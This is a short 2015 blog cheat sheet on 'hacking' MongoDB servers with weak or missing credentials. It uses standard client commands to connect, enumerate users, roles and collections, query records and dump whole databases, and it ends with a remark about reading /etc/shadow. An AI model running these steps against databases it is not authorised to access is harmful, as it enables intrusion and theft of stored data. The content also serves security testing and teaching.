Thursday, July 2, 2015

Intro to Hacking Mongo DB

By Tony Lee


There is a plethora of literature on hacking SQL databases.  This means going from database access to OS level execution or shells.  However there seems to be a shortage of information on hacking no-sql databases such as Mongo DB.  This article will hopefully help others get a jump start when they run into a Mongo database with weak or no credentials (yes it has happened).  It does not list all possibilities and is only meant to be a cheat sheet.  Feel free to list your favorite commands as well as tips and tricks in the comment section below.

Install mongo client on Kali:

apt-get install mongodb-clients

Connect to DB:

mongo --port <port> -u <username> -p <password> <IP>
Note:  Port 27017 is default value

ex:  mongo -u foo -p bar

Show server info:

db.adminCommand( { "hostInfo" : 1 } )
ex: db.adminCommand( { "hostInfo" : 1 } )
"system" : {
"currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
"hostname" : "AwesomePC",
"cpuAddrSize" : 64,
"memSizeMB" : 1002,
"numCores" : 2,
"cpuArch" : "x86_64",
"numaEnabled" : false
"os" : {
"type" : "Linux",
"name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
"version" : "Kernel 3.2.0-4-amd64"
"extra" : {
"versionString" : "Linux version 3.2.0-4-amd64 ( (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
"libcVersion" : "2.13",
"kernelVersion" : "3.2.0-4-amd64",
"cpuFrequencyMHz" : "2266.747",
"ok" : 1

Show users:

show users
db.runCommand( { usersInfo: 1 } )

ex:  show users

Show roles:

show roles

ex:  show roles

Show databases:

show dbs

ex:  show dbs
SecretDB  (size of DB)
AwesomeDB (size of DB)
EmptyDB   (empty)

Use database:

use <db_name>

ex:  use SecretDB

Show tables (called collections):

show tables
show collections

ex: show tables

List data in the table/collection:


ex:  db.users.find()

Note:  by default, it will only display one page

Can also set limit with:

ex:  db.users.find().limit(5)

Search for exact match in the table/collection:

db.<collection_name>.find( { <column_name> : "<value>" } )

ex:  db.users.find( { name : "Tony" } )

Wildcard search data in the table/collection:

db.<collection_name>.find( { <column_name> : /<value>/i } )

Note:  the i at the end of the /, makes the search case insensitive

ex:  db.users.find( { name : /tony/i } )

Dump the DB for off-line grepping:

mongodump -u <user> -p <pass> -h <IP> --db <db_name>

ex:  mongodump -u foo -p bar -h --db SecretDB

Note:  Results are dumped to:  dump/<db_name>/<collection_name>.bson




The cat command reads your own files, not the remote system's files
ex:  cat ("/etc/shadow") is your own shadow file :(  Bummer, I know!